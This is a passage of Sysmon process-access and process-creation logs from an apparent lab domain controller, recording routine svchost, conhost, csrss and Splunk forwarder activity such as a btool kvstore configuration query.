C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3335,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3336,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3337,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3338,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3339,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-0010AC650500}\r\nTargetProcessId: 4716\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-0010AC650500}","TargetProcessId":"4716","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3340,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.406\r\nProcessGuid: {41C8662E-1FF4-5F25-0000-00106D660500}\r\nProcessId: 4440\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1FF4-5F25-0000-0010AC650500}\r\nParentProcessId: 4716\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.406","ProcessGuid":"{41C8662E-1FF4-5F25-0000-00106D660500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1FF4-5F25-0000-0010AC650500}","ParentProcessId":"4716","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list kvstore --no-log","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3341,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1FF4-5F25-0000-0010AC650500}\r\nSourceProcessId: 4716\r\nSourceThreadId: 4644\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-00106D660500}\r\nTargetProcessId: 4440\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1FF4-5F25-0000-0010AC650500}","SourceProcessId":"4716","SourceThreadId":"4644","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-00106D660500}","TargetProcessId":"4440","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3342,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-00106D660500}\r\nTargetProcessId: 4440\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-00106D660500}","TargetProcessId":"4440","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3343,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 